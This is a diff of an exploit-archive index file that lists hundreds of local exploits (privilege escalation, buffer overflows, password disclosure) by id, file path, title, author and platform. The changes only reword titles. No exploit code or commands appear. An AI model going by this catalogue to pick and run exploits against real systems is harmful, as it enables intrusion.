@@ -5958,7 +5960,7 @@ id,file,description,date,author,type,platform,port 885,exploits/windows/local/885.cpp,"iPool 1.6.81 - Local Password Disclosure",2005-03-16,Kozan,local,windows, 890,exploits/linux/local/890.pl,"PostScript Utilities - psnup Argument Buffer Overflow",2005-03-21,lammat,local,linux, 895,exploits/linux/local/895.c,"Linux Kernel 2.4.x/2.6.x - 'uselib()' Local Privilege Escalation (3)",2005-03-22,sd,local,linux, -896,exploits/osx/local/896.c,"Apple Mac OSX 10.3.8 - 'CF_CHARSET_PATH' Local Buffer Overflow / Privilege Escalation",2005-03-22,vade79,local,osx, +896,exploits/osx/local/896.c,"Apple Mac OSX 10.3.8 - 'CF_CHARSET_PATH' Local Buffer Overflow / Local Privilege Escalation",2005-03-22,vade79,local,osx, 898,exploits/aix/local/898.sh,"AIX 5.3.0 - 'invscout' Local Command Execution",2005-03-25,ri0t,local,aix, 905,exploits/windows/local/905.c,"BakBone NetVault 6.x/7.x - Local Stack Buffer Overflow",2005-04-01,class101,local,windows, 912,exploits/windows/local/912.c,"GetDataBack Data Recovery 2.31 - Licence Recover",2005-04-04,Kozan,local,windows, 
@@ -6017,14 +6019,14 @@ id,file,description,date,author,type,platform,port 1182,exploits/solaris/local/1182.c,"Solaris 2.6/7/8/9 (SPARC) - 'ld.so.1' Local Privilege Escalation",2004-12-24,"Marco Ivaldi",local,solaris, 1185,exploits/osx/local/1185.pl,"Adobe Version Cue 1.0/1.0.1 (OSX) - Local Privilege Escalation",2005-08-30,vade79,local,osx, 1186,exploits/osx/local/1186.c,"Adobe Version Cue 1.0/1.0.1 (OSX) - '-lib' Local Privilege Escalation",2005-08-30,vade79,local,osx, -1187,exploits/linux/local/1187.c,"Gopher 3.0.9 - '+VIEWS' Remote Client-Side Buffer Overflow",2005-08-30,vade79,local,linux, +1187,exploits/linux/local/1187.c,"Gopher 3.0.9 - '+VIEWS' Client-Side Buffer Overflow",2005-08-30,vade79,local,linux, 1197,exploits/windows/local/1197.c,"Microsoft Windows - 'keybd_event' Local Privilege Escalation",2005-09-06,"Andrés Acunha",local,windows, 1198,exploits/windows/local/1198.c,"Microsoft Windows - CSRSS Privilege Escalation (MS05-018)",2005-09-06,eyas,local,windows, 1215,exploits/linux/local/1215.c,"Wireless Tools 26 (IWConfig) - Local Privilege Escalation",2005-09-14,Qnix,local,linux, 1229,exploits/linux/local/1229.sh,"Qpopper 4.0.8 (Linux) - 'poppassd' Local Privilege Escalation",2005-09-24,kingcope,local,linux, 1230,exploits/bsd/local/1230.sh,"Qpopper 4.0.8 (FreeBSD) - Local Privilege Escalation",2005-09-24,kingcope,local,bsd, 1248,exploits/solaris/local/1248.pl,"Solaris 10 (x86) - DtPrintinfo/Session Privilege Escalation",2005-10-12,"Charles Stevenson",local,solaris, -1267,exploits/linux/local/1267.c,"XMail 1.21 - '-t' Command Line Option Buffer Overflow / Privilege Escalation",2005-10-20,qaaz,local,linux, +1267,exploits/linux/local/1267.c,"XMail 1.21 - '-t' Command Line Option Local Buffer Overflow / Local Privilege Escalation",2005-10-20,qaaz,local,linux, 1297,exploits/linux/local/1297.py,"F-Secure Internet GateKeeper for Linux < 2.15.484 / Gateway < 2.16 - Local Privilege Escalation",2005-11-07,"Xavier de Leon",local,linux, 
1299,exploits/linux/local/1299.sh,"Linux chfn (SuSE 9.3/10) - Local Privilege Escalation",2005-11-08,Hunger,local,linux, 1300,exploits/linux/local/1300.sh,"Operator Shell (OSH) 1.7-14 - Local Privilege Escalation",2005-11-09,"Charles Stevenson",local,linux, @@ -6033,7 +6035,7 @@ id,file,description,date,author,type,platform,port 1316,exploits/linux/local/1316.pl,"Veritas Storage Foundation 4.0 - VCSI18N_LANG Local Overflow",2005-11-12,"Kevin Finisterre",local,linux, 1347,exploits/qnx/local/1347.c,"QNX RTOS 6.3.0 (x86) - 'phgrafx' Local Buffer Overflow",2005-11-30,"p. minervini",local,qnx, 1360,exploits/solaris/local/1360.c,"Appfluent Database IDS < 2.1.0.103 - Environment Variable Local Overflow",2005-12-07,c0ntex,local,solaris, -1397,exploits/linux/local/1397.c,"Linux Kernel 2.6.9 < 2.6.11 (RHEL 4) - 'SYS_EPoll_Wait' Integer Overflow / Privilege Escalation",2005-12-30,alert7,local,linux, +1397,exploits/linux/local/1397.c,"Linux Kernel 2.6.9 < 2.6.11 (RHEL 4) - 'SYS_EPoll_Wait' Local Integer Overflow / Local Privilege Escalation",2005-12-30,alert7,local,linux, 1402,exploits/sco/local/1402.c,"SCO OpenServer 5.0.7 - 'termsh' Local Privilege Escalation",2006-01-03,prdelka,local,sco, 1403,exploits/windows/local/1403.c,"WinRAR 3.30 - 'Filename' Local Buffer Overflow (1)",2006-01-04,K4P0,local,windows, 1404,exploits/windows/local/1404.c,"WinRAR 3.30 - 'Filename' Local Buffer Overflow (2)",2006-01-04,c0d3r,local,windows, 
@@ -6073,7 +6075,7 @@ id,file,description,date,author,type,platform,port 1911,exploits/windows/local/1911.c,"Microsoft Windows XP/2000 - 'Mrxsmb.sys' Local Privilege Escalation (PoC) (MS06-030)",2006-06-14,"Ruben Santamarta",local,windows, 1917,exploits/windows/local/1917.pl,"Pico Zip 4.01 - 'Filename' Local Buffer Overflow",2006-06-15,c0rrupt,local,windows, 1924,exploits/multiple/local/1924.txt,"Sun iPlanet Messaging Server 5.2 HotFix 1.16 - Root Password Disclosure",2006-06-18,php0t,local,multiple, -1944,exploits/windows/local/1944.c,"Microsoft Excel - Remote Code Execution",2006-06-22,"naveed afzal",local,windows, +1944,exploits/windows/local/1944.c,"Microsoft Excel - Code Execution",2006-06-22,"naveed afzal",local,windows, 1958,exploits/windows/local/1958.pl,"Microsoft Excel 2003 - Hlink Stack Buffer Overflow (SEH)",2006-06-27,FistFuXXer,local,windows, 1962,exploits/osx/local/1962.pl,"Apple Mac OSX 10.4.6 (x86) - 'launchd' Local Format String",2006-06-28,"Kevin Finisterre",local,osx, 1973,exploits/osx/local/1973.pl,"Apple Mac OSX 10.4.6 (PPC) - 'launchd' Local Format String",2006-07-01,"Kevin Finisterre",local,osx, 
@@ -6125,12 +6127,12 @@ id,file,description,date,author,type,platform,port 2569,exploits/solaris/local/2569.sh,"Solaris 10 libnspr - 'LD_PRELOAD' Arbitrary File Creation Privilege Escalation (2)",2006-10-16,"Marco Ivaldi",local,solaris, 2580,exploits/osx/local/2580.pl,"Xcode OpenBase 9.1.5 (OSX) - Root File Create Privilege Escalation",2006-10-16,"Kevin Finisterre",local,osx, 2581,exploits/linux/local/2581.c,"Nvidia Graphics Driver 8774 - Local Buffer Overflow",2006-10-16,"Rapid7 Security",local,linux, -2633,exploits/hp-ux/local/2633.c,"HP-UX 11i - 'swpackage' Local Stack Overflow / Privilege Escalation",2006-10-24,prdelka,local,hp-ux, -2634,exploits/hp-ux/local/2634.c,"HP-UX 11i - 'swmodify' Local Stack Overflow / Privilege Escalation",2006-10-24,prdelka,local,hp-ux, +2633,exploits/hp-ux/local/2633.c,"HP-UX 11i - 'swpackage' Local Stack Overflow / Local Privilege Escalation",2006-10-24,prdelka,local,hp-ux, +2634,exploits/hp-ux/local/2634.c,"HP-UX 11i - 'swmodify' Local Stack Overflow / Local Privilege Escalation",2006-10-24,prdelka,local,hp-ux, 2635,exploits/hp-ux/local/2635.c,"HP-UX 11i - 'swask' Format String Privilege Escalation",2006-10-24,prdelka,local,hp-ux, 2636,exploits/hp-ux/local/2636.c,"HP-UX 11i - 'LIBC TZ' Enviroment Variable Privilege Escalation",2006-10-24,prdelka,local,hp-ux, 2641,exploits/solaris/local/2641.sh,"Solaris 10 libnspr - 'Constructor' Arbitrary File Creation Privilege Escalation (3)",2006-10-24,"Marco Ivaldi",local,solaris, -2676,exploits/windows/local/2676.cpp,"Kaspersky Internet Security 6.0.0.303 - IOCTL KLICK Overflow / Privilege Escalation",2006-10-29,Nanika,local,windows, +2676,exploits/windows/local/2676.cpp,"Kaspersky Internet Security 6.0.0.303 - IOCTL KLICK Local Overflow / Local Privilege Escalation",2006-10-29,Nanika,local,windows, 2737,exploits/osx/local/2737.pl,"Xcode OpenBase 10.0.0 (OSX) - Symlink Privilege Escalation",2006-11-08,"Kevin Finisterre",local,osx, 2738,exploits/osx/local/2738.pl,"Xcode OpenBase 10.0.0 (OSX) - 
Unsafe System Call Privilege Escalation",2006-11-08,"Kevin Finisterre",local,osx, 2788,exploits/osx/local/2788.pl,"Kerio WebSTAR 5.4.2 (OSX) - 'libucache.dylib' Local Privilege Escalation",2006-11-15,"Kevin Finisterre",local,osx, @@ -6167,10 +6169,10 @@ id,file,description,date,author,type,platform,port 3273,exploits/tru64/local/3273.ksh,"HP Tru64 Alpha OSF1 5.1 - 'ps' Information Leak",2007-02-06,bunker,local,tru64, 3330,exploits/linux/local/3330.pl,"ProFTPd 1.3.0/1.3.0a - 'mod_ctrls' 'support' Local Buffer Overflow (1)",2007-02-18,Revenge,local,linux, 3333,exploits/linux/local/3333.pl,"ProFTPd 1.3.0/1.3.0a - 'mod_ctrls' 'support' Local Buffer Overflow (2)",2007-02-19,Revenge,local,linux, -3342,exploits/windows/local/3342.c,"News Rover 12.1 Rev 1 - Remote Stack Overflow (1)",2007-02-20,Marsu,local,windows, +3342,exploits/windows/local/3342.c,"News Rover 12.1 Rev 1 - Stack Overflow (1)",2007-02-20,Marsu,local,windows, 3349,exploits/windows/local/3349.c,"News Bin Pro 5.33 - '.nbi' Local Buffer Overflow",2007-02-21,Marsu,local,windows, 3356,exploits/linux/local/3356.sh,"Nortel SSL VPN Linux Client 6.0.3 - Local Privilege Escalation",2007-02-21,"Jon Hart",local,linux, -3369,exploits/windows/local/3369.pl,"News Rover 12.1 Rev 1 - Remote Stack Overflow (2)",2007-02-24,"Umesh Wanve",local,windows, +3369,exploits/windows/local/3369.pl,"News Rover 12.1 Rev 1 - Stack Overflow (2)",2007-02-24,"Umesh Wanve",local,windows, 3383,exploits/plan9/local/3383.c,"Plan 9 Kernel - 'devenv.c OTRUNC/pwrite' Local Privilege Escalation",2007-02-28,"Don Bailey",local,plan9, 3384,exploits/linux/local/3384.c,"Apache 1.3.34/1.3.33 (Ubuntu / Debian) - CGI TTY Privilege Escalation",2007-02-28,"Kristian Hermansen",local,linux, 3386,exploits/osx/local/3386.pl,"McAfee VirusScan for Mac (Virex) 7.7 - Local Privilege Escalation",2007-02-28,"Kevin Finisterre",local,osx, 
@@ -6198,7 +6200,7 @@ id,file,description,date,author,type,platform,port 3571,exploits/linux/local/3571.php,"PHP < 4.4.5/5.2.1 - '_SESSION unset()' Local Overflow",2007-03-25,"Stefan Esser",local,linux, 3572,exploits/linux/local/3572.php,"PHP < 4.4.5/5.2.1 - '_SESSION' Deserialization Overwrite",2007-03-25,"Stefan Esser",local,linux, 3576,exploits/windows/local/3576.php,"PHP 5.2.1 with PECL PHPDOC - Local Buffer Overflow",2007-03-25,rgod,local,windows, -3578,exploits/bsd/local/3578.c,"FreeBSD mcweject 0.9 'Eject' - Local Buffer Overflow / Privilege Escalation",2007-03-26,harry,local,bsd, +3578,exploits/bsd/local/3578.c,"FreeBSD mcweject 0.9 'Eject' - Local Buffer Overflow / Local Privilege Escalation",2007-03-26,harry,local,bsd, 3587,exploits/linux/local/3587.c,"Linux Kernel 2.6.20 with DCCP Support - Memory Disclosure (1)",2007-03-27,"Robert Swiecki",local,linux, 3593,exploits/windows/local/3593.c,"Corel WordPerfect X3 13.0.0.565 - '.prs' Local Buffer Overflow",2007-03-28,"Jonathan So",local,windows, 3595,exploits/linux/local/3595.c,"Linux Kernel 2.6.20 with DCCP Support - Memory Disclosure (2)",2007-03-28,"Robert Swiecki",local,linux, 
@@ -6290,7 +6292,7 @@ id,file,description,date,author,type,platform,port 4749,exploits/windows/local/4749.c,"Rosoft Media Player 4.1.7 - '.m3u' Local Stack Overflow",2007-12-18,devcode,local,windows, 4751,exploits/windows/local/4751.pl,"jetAudio 7.0.5 COWON Media Center MP4 - Local Stack Overflow",2007-12-18,"SYS 49152",local,windows, 4756,exploits/linux/local/4756.c,"Linux Kernel < 2.6.11.5 - BlueTooth Stack Privilege Escalation",2007-12-18,Backdoored,local,linux, -4759,exploits/osx/local/4759.c,"Apple Mac OSX - mount_smbfs Stack Based Buffer Overflow",2007-12-19,"Subreption LLC.",local,osx, +4759,exploits/osx/local/4759.c,"Apple Mac OSX - 'mount_smbfs' Local Stack Buffer Overflow",2007-12-19,"Subreption LLC.",local,osx, 4839,exploits/windows/local/4839.pl,"CoolPlayer 2.17 - '.m3u' Local Stack Overflow",2008-01-05,Trancek,local,windows, 4892,exploits/windows/local/4892.py,"Microsoft Visual InterDev 6.0 SP6 - '.sln' Local Buffer Overflow",2008-01-11,shinnai,local,windows, 4938,exploits/windows/local/4938.py,"Microsoft Visual Basic Enterprise 6 SP6 - '.dsr' File Handling Buffer Overflow",2008-01-18,shinnai,local,windows, 
@@ -6344,7 +6346,7 @@ id,file,description,date,author,type,platform,port 6705,exploits/windows/local/6705.txt,"Microsoft Windows Server 2003 - Token Kidnapping Local (PoC)",2008-10-08,"Cesar Cerrudo",local,windows, 6757,exploits/windows/local/6757.txt,"Microsoft Windows XP/2003 - 'afd.sys' Local Privilege Escalation (K-plugin) (MS08-066)",2008-10-15,"Ruben Santamarta",local,windows, 6787,exploits/windows/local/6787.pl,"BitTorrent 6.0.3 - '.torrent' Local Stack Buffer Overflow",2008-10-19,"Guido Landi",local,windows, -6798,exploits/windows/local/6798.pl,"VideoLAN VLC Media Player 0.9.4 - '.TY' File Stack Based Buffer Overflow",2008-10-21,"Guido Landi",local,windows, +6798,exploits/windows/local/6798.pl,"VideoLAN VLC Media Player 0.9.4 - '.TY' Local Stack Buffer Overflow",2008-10-21,"Guido Landi",local,windows, 6825,exploits/windows/local/6825.pl,"VideoLAN VLC Media Player 0.9.4 - '.ty' Local Buffer Overflow (SEH)",2008-10-23,"Guido Landi",local,windows, 6831,exploits/windows/local/6831.cpp,"TugZip 3.00 Archiver - '.zip' Local Buffer Overflow",2008-10-24,"fl0 fl0w",local,windows, 6851,exploits/linux/local/6851.c,"Linux Kernel < 2.6.22 - 'ftruncate()'/'open()' Local Privilege Escalation",2008-10-27,gat3way,local,linux, 
@@ -6671,7 +6673,7 @@ id,file,description,date,author,type,platform,port 9988,exploits/windows/local/9988.txt,"Adobe Photoshop Elements - Active File Monitor Service Privilege Escalation",2009-10-29,bellick,local,windows, 9990,exploits/multiple/local/9990.txt,"Adobe Reader / Acrobat - '.U3D' File Invalid Array Index Overflow",2009-11-09,"Felipe Andres Manzano",local,multiple, 9991,exploits/windows/local/9991.txt,"Alleycode 2.21 - Local Overflow (SEH) (PoC)",2009-10-05,"Rafael Sousa",local,windows, -10009,exploits/windows/local/10009.txt,"Free Download Manager - Torrent File Parsing Multiple Remote Buffer Overflow Vulnerabilities (Metasploit)",2009-11-11,"Carsten Eiram",local,windows, +10009,exploits/windows/local/10009.txt,"Free Download Manager - '.Torrent' File Parsing Multiple Buffer Overflow Vulnerabilities (Metasploit)",2009-11-11,"Carsten Eiram",local,windows, 10010,exploits/windows/local/10010.txt,"Free WMA MP3 Converter 1.1 - '.wav' Local Buffer Overflow",2009-10-09,KriPpLer,local,windows, 10018,exploits/linux/local/10018.sh,"Linux Kernel 2.6.32 - 'pipe.c' Local Privilege Escalation (4)",2009-11-12,"Earl Chew",local,linux, 10038,exploits/linux/local/10038.txt,"proc File - Descriptors Directory Permissions Bypass",2009-10-23,"Pavel Machek",local,linux, 
@@ -6689,7 +6691,7 @@ id,file,description,date,author,type,platform,port 10213,exploits/windows/local/10213.txt,"Autodesk Maya Script - Nodes Arbitrary Command Execution",2009-11-23,"Core Security",local,windows, 10226,exploits/windows/local/10226.py,"Serenity Audio Player Playlist - '.m3u' Local Buffer Overflow",2009-11-25,Rick2600,local,windows, 10240,exploits/windows/local/10240.py,"Millenium MP3 Studio 2.0 - 'pls' Local Buffer Overflow",2009-11-28,Molotov,local,windows, -10244,exploits/windows/local/10244.txt,"MuPDF < 20091125231942 - pdf_shade4.c Multiple Stack Based Buffer Overflows",2009-11-28,"Christophe Devine",local,windows, +10244,exploits/windows/local/10244.txt,"MuPDF < 20091125231942 - pdf_shade4.c Multiple Stack Buffer Overflows",2009-11-28,"Christophe Devine",local,windows, 10255,exploits/bsd/local/10255.txt,"FreeBSD 8.0 Run-Time Link-Editor (RTLD) - Local Privilege Escalation",2009-11-30,kingcope,local,bsd, 10264,exploits/multiple/local/10264.txt,"Oracle - SYS.LT.MERGEWORKSPACE Evil Cursor",2009-12-01,"Andrea Purificato",local,multiple, 10265,exploits/multiple/local/10265.txt,"Oracle - SYS.LT.COMPRESSWORKSPACETREE Evil Cursor",2009-12-01,"Andrea Purificato",local,multiple, 
@@ -6701,7 +6703,7 @@ id,file,description,date,author,type,platform,port 10295,exploits/windows/local/10295.txt,"DAZ Studio - Arbitrary Command Execution",2009-12-03,"Core Security",local,windows, 10296,exploits/php/local/10296.txt,"PHP 5.2.10/5.3.0 - 'ini_restore()' Memory Information Disclosure",2009-12-03,"Maksymilian Arciemowicz",local,php, 10298,exploits/windows/local/10298.c,"Jasc Paint Shop Pro 8 - Local Universal Buffer Overflow",2009-12-04,"fl0 fl0w",local,windows, -10313,exploits/linux/local/10313.c,"Libmodplug - 's3m' Remote Buffer Overflow",2008-02-25,dummy,local,linux, +10313,exploits/linux/local/10313.c,"Libmodplug - 's3m' Buffer Overflow",2008-02-25,dummy,local,linux, 10319,exploits/windows/local/10319.py,"PointDev IDEAL Administration 2009 9.7 - Local Buffer Overflow",2009-12-05,Dr_IDE,local,windows, 10320,exploits/windows/local/10320.py,"M3U To ASX-WPL 1.1 - '.m3u' Local Buffer Overflow",2009-12-05,Encrypt3d.M!nd,local,windows, 10321,exploits/windows/local/10321.py,"Microsoft HTML Help Workshop 4.74 - '.hhp' Local Buffer Overflow (1)",2009-12-05,Encrypt3d.M!nd,local,windows, 
@@ -6775,7 +6777,7 @@ id,file,description,date,author,type,platform,port 11205,exploits/windows/local/11205.pl,"MP3 Studio 1.x - '.m3u' Local Stack Overflow (Universal)",2010-01-20,"D3V!L FUCKER",local,windows, 11208,exploits/windows/local/11208.pl,"jetAudio 8.0.0.2 Basic - '.m3u' Local Stack Overflow",2010-01-21,cr4wl3r,local,windows, 11219,exploits/windows/local/11219.pl,"SOMPL Player 1.0 - Local Buffer Overflow",2010-01-22,Rick2600,local,windows, -11229,exploits/windows/local/11229.txt,"Microsoft Internet Explorer - 'wshom.ocx' (Run) ActiveX Remote Code Execution (Add Admin)",2010-01-22,Stack,local,windows, +11229,exploits/windows/local/11229.txt,"Microsoft Internet Explorer - 'wshom.ocx' (Run) ActiveX Code Execution (Add Admin)",2010-01-22,Stack,local,windows, 11232,exploits/windows/local/11232.c,"Authentium SafeCentral 2.6 - 'shdrv.sys' Local Kernel Ring0 SYSTEM",2010-01-22,mu-b,local,windows, 11255,exploits/windows/local/11255.pl,"Winamp 5.572 - 'whatsnew.txt' Local Stack Overflow",2010-01-25,Dz_attacker,local,windows, 11256,exploits/windows/local/11256.pl,"Winamp 5.572 (Windows XP SP3 DE) - 'whatsnew.txt' Local Buffer Overflow",2010-01-25,NeoCortex,local,windows, 
@@ -6846,7 +6848,7 @@ id,file,description,date,author,type,platform,port 12261,exploits/windows/local/12261.rb,"Archive Searcher - '.zip' Local Stack Overflow",2010-04-16,Lincoln,local,windows, 12293,exploits/windows/local/12293.py,"TweakFS 1.0 - FSX Edition Stack Buffer Overflow",2010-04-19,corelanc0d3r,local,windows, 12326,exploits/windows/local/12326.py,"ZipGenius 6.3.1.2552 - 'zgtips.dll' Local Stack Buffer Overflow",2010-04-21,corelanc0d3r,local,windows, -12342,exploits/windows/local/12342.pl,"EDraw Flowchart ActiveX Control 2.3 - '.edd parsing' Remote Buffer Overflow (PoC)",2010-04-22,LiquidWorm,local,windows, +12342,exploits/windows/local/12342.pl,"EDraw Flowchart ActiveX Control 2.3 - '.edd parsing' Buffer Overflow (PoC)",2010-04-22,LiquidWorm,local,windows, 12368,exploits/windows/local/12368.pl,"ZipWrangler 1.20 - '.zip' File (SEH)",2010-04-24,"TecR0c & Sud0",local,windows, 12379,exploits/windows/local/12379.php,"Easyzip 2000 3.5 - '.zip' Local Stack Buffer Overflow (PoC)",2010-04-25,mr_me,local,windows, 12388,exploits/windows/local/12388.rb,"WM Downloader 3.0.0.9 - Local Buffer Overflow (Metasploit)",2010-04-25,blake,local,windows, 
@@ -6990,7 +6992,7 @@ id,file,description,date,author,type,platform,port 14814,exploits/linux/local/14814.c,"Linux Kernel < 2.6.36-rc1 (Ubuntu 10.04 / 2.6.32) - 'CAN BCM' Local Privilege Escalation",2010-08-27,"Jon Oberheide",local,linux, 14830,exploits/linux/local/14830.py,"Nginx 0.6.38 - Heap Corruption",2010-08-29,"Aaron Conole",local,linux, 14831,exploits/windows/local/14831.rb,"SnackAmp 3.1.2 - SMP Buffer Overflow (SEH)",2010-08-29,"James Fitts",local,windows, -14944,exploits/windows/local/14944.py,"Microsoft Visio 2002 - '.DXF' File Stack based Overflow",2010-09-08,Abysssec,local,windows, +14944,exploits/windows/local/14944.py,"Microsoft Visio 2002 - '.DXF' Local Stack Overflow",2010-09-08,Abysssec,local,windows, 14966,exploits/windows/local/14966.py,"Excel RTD - Memory Corruption",2010-09-10,Abysssec,local,windows, 14959,exploits/windows/local/14959.py,"Acoustica MP3 Audio Mixer 2.471 - Extended .M3U Directives (SEH)",2010-09-09,"Carlos Mario Penagos Hollmann",local,windows, 14961,exploits/win_x86/local/14961.py,"Audiotran 1.4.2.4 - Local Overflow (SEH)",2010-09-09,"Abhishek Lyall",local,win_x86, 
@@ -7148,7 +7150,7 @@ id,file,description,date,author,type,platform,port 16645,exploits/windows/local/16645.rb,"URSoft W32Dasm 8.93 - Disassembler Function Buffer Overflow (Metasploit)",2010-09-25,Metasploit,local,windows, 16646,exploits/windows/local/16646.rb,"HT-MP3Player 1.0 - '.HT3' File Parsing Buffer Overflow (Metasploit)",2010-04-30,Metasploit,local,windows, 16648,exploits/windows/local/16648.rb,"Microsoft HTML Help Workshop 4.74 - '.hhp' Cotent Buffer Overflow (Metasploit) (2)",2010-09-25,Metasploit,local,windows, -16651,exploits/windows/local/16651.rb,"AOL 9.5 - 'Phobos.Playlist Import()' Stack Based Buffer Overflow (Metasploit)",2010-09-25,Metasploit,local,windows, +16651,exploits/windows/local/16651.rb,"AOL 9.5 - 'Phobos.Playlist Import()' Stack Buffer Overflow (Metasploit)",2010-09-25,Metasploit,local,windows, 16652,exploits/windows/local/16652.rb,"Adobe - FlateDecode Stream Predictor 02 Integer Overflow (Metasploit) (2)",2010-09-25,Metasploit,local,windows, 16653,exploits/windows/local/16653.rb,"Xion Audio Player 1.0.126 - Unicode Stack Buffer Overflow (Metasploit)",2010-12-16,Metasploit,local,windows, 16654,exploits/windows/local/16654.rb,"Orbital Viewer - '.ORB' File Parsing Buffer Overflow (Metasploit)",2010-03-09,Metasploit,local,windows, 
@@ -7309,10 +7311,10 @@ id,file,description,date,author,type,platform,port 18147,exploits/linux/local/18147.c,"bzexe (bzip2) - Race Condition",2011-11-23,vladz,local,linux, 18174,exploits/windows/local/18174.py,"GOM Player 2.1.33.5071 - '.asx' File Unicode Stack Buffer Overflow",2011-11-30,"Debasish Mandal",local,windows, 18176,exploits/windows/local/18176.py,"Microsoft Windows XP/2003 - 'afd.sys' Local Privilege Escalation (MS11-080)",2011-11-30,ryujin,local,windows, -18178,exploits/windows/local/18178.rb,"CCMPlayer 1.5 - '.m3u' Stack based Buffer Overflow (SEH) (Metasploit)",2011-11-30,Rh0,local,windows, +18178,exploits/windows/local/18178.rb,"CCMPlayer 1.5 - '.m3u' Stack Buffer Overflow (SEH) (Metasploit)",2011-11-30,Rh0,local,windows, 18184,exploits/windows/local/18184.rb,"Final Draft 8 - Multiple Stack Buffer Overflows (Metasploit)",2011-12-01,"Nick Freeman",local,windows, 18186,exploits/windows/local/18186.rb,"StoryBoard Quick 6 - Local Stack Buffer Overflow (Metasploit)",2011-12-01,"Nick Freeman",local,windows, -18195,exploits/windows/local/18195.rb,"CCMPlayer 1.5 - '.m3u' Stack based Buffer Overflow (Metasploit)",2011-12-03,Metasploit,local,windows, +18195,exploits/windows/local/18195.rb,"CCMPlayer 1.5 - '.m3u' Stack Buffer Overflow (Metasploit)",2011-12-03,Metasploit,local,windows, 18201,exploits/windows/local/18201.txt,"SopCast 3.4.7 - 'Diagnose.exe' Improper Permissions",2011-12-05,LiquidWorm,local,windows, 18228,exploits/linux/local/18228.sh,"Acpid 1:2.0.10-1ubuntu2 (Ubuntu 11.04/11.10) - Boundary Crossing Privilege Escalation",2011-12-10,otr,local,linux, 18258,exploits/windows/local/18258.c,"TORCS 1.3.1 - acc Buffer Overflow",2011-12-20,"Andrés Gómez",local,windows, 
@@ -7352,7 +7354,7 @@ id,file,description,date,author,type,platform,port 18862,exploits/windows/local/18862.php,"Adobe Photoshop CS5.1 - U3D.8BI Collada Asset Elements Stack Overflow",2012-05-11,rgod,local,windows, 18869,exploits/windows/local/18869.pl,"AnvSoft Any Video Converter 4.3.6 - Unicode Buffer Overflow",2012-05-12,h1ch4m,local,windows, 18892,exploits/windows/local/18892.txt,"SkinCrafter ActiveX Control 3.0 - Local Buffer Overflow",2012-05-17,"saurabh sharma",local,windows, -18905,exploits/windows/local/18905.rb,"Foxit Reader 3.0 - Open Execute Action Stack Based Buffer Overflow (Metasploit)",2012-05-21,Metasploit,local,windows, +18905,exploits/windows/local/18905.rb,"Foxit Reader 3.0 - Open Execute Action Stack Buffer Overflow (Metasploit)",2012-05-21,Metasploit,local,windows, 18914,exploits/windows/local/18914.py,"Novell Client 4.91 SP4 - Local Privilege Escalation",2012-05-22,sickness,local,windows, 18917,exploits/linux/local/18917.txt,"Apache Mod_Auth_OpenID - Session Stealing",2012-05-24,"Peter Ellehauge",local,linux, 18923,exploits/windows/local/18923.rb,"OpenOffice - OLE Importer DocumentSummaryInformation Stream Handling Overflow (Metasploit)",2012-05-25,Metasploit,local,windows, 
@@ -7383,7 +7385,7 @@ id,file,description,date,author,type,platform,port 19122,exploits/linux/local/19122.txt,"Slackware Linux 3.5 - '/etc/group' Local Privilege Escalation",1998-07-13,"Richard Thomas",local,linux, 19125,exploits/linux/local/19125.txt,"Oracle 8 - oratclsh Suid",1999-04-29,"Dan Sugalski",local,linux, 19126,exploits/solaris/local/19126.txt,"Sun Solaris 2.6 - power management",1998-07-16,"Ralf Lehmann",local,solaris, -19128,exploits/solaris/local/19128.c,"Sun Solaris 7.0 - '/usr/dt/bin/sdtcm_convert' Local Overflow / Privilege Escalation",1998-10-23,UNYUN,local,solaris, +19128,exploits/solaris/local/19128.c,"Sun Solaris 7.0 - '/usr/dt/bin/sdtcm_convert' Local Overflow / Local Privilege Escalation",1998-10-23,UNYUN,local,solaris, 19138,exploits/windows/local/19138.txt,"ESRI ArcGIS 10.0.x / ArcMap 9 - Arbitrary Code Execution",2012-06-14,"Boston Cyber Defense",local,windows, 19139,exploits/multiple/local/19139.py,"Adobe Illustrator CS5.5 - Memory Corruption",2012-06-14,"Felipe Andres Manzano",local,multiple, 19142,exploits/linux/local/19142.sh,"Oracle 8 - File Access",1999-05-06,"Kevin Wenchel",local,linux, 
@@ -7397,7 +7399,7 @@ id,file,description,date,author,type,platform,port 19163,exploits/irix/local/19163.sh,"SGI IRIX 6.4 - 'ioconfig' Local Privilege Escalation",1998-07-20,Loneguard,local,irix, 19167,exploits/windows/local/19167.txt,"Ipswitch IMail 5.0 / Ipswitch WS_FTP Server 1.0.1/1.0.2 - Local Privilege Escalation",1999-02-04,Marc,local,windows, 19168,exploits/unix/local/19168.sh,"SGI IRIX 6.5.4 / Solaris 2.5.1 - ps(1) Buffer Overflow",1997-04-28,"Joe Zbiciak",local,unix, -19172,exploits/unix/local/19172.c,"BSD/OS 2.1 / DG/UX 7.0 / Debian 1.3 / HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.4 / Solaris 2.5.1 - 'xlock' Local Overflow / Privilege Escalation (1)",1997-04-26,cesaro,local,unix, +19172,exploits/unix/local/19172.c,"BSD/OS 2.1 / DG/UX 7.0 / Debian 1.3 / HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.4 / Solaris 2.5.1 - 'xlock' Local Overflow / Local Privilege Escalation (1)",1997-04-26,cesaro,local,unix, 19173,exploits/unix/local/19173.c,"BSD/OS 2.1 / DG/UX 7.0 / Debian 1.3 / HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.4 / Solaris 2.5.1 - '/usr/bin/X11/xlock' Local Privilege Escalation (2)",1997-04-26,BeastMaster,local,unix, 19175,exploits/windows/local/19175.rb,"Lattice Semiconductor PAC-Designer 6.21 - Symbol Value Buffer Overflow (Metasploit)",2012-06-17,Metasploit,local,windows, 19176,exploits/windows/local/19176.rb,"TFM MMPlayer - '.m3u' / '.ppl' Local Buffer Overflow (Metasploit)",2012-06-15,Metasploit,local,windows, 
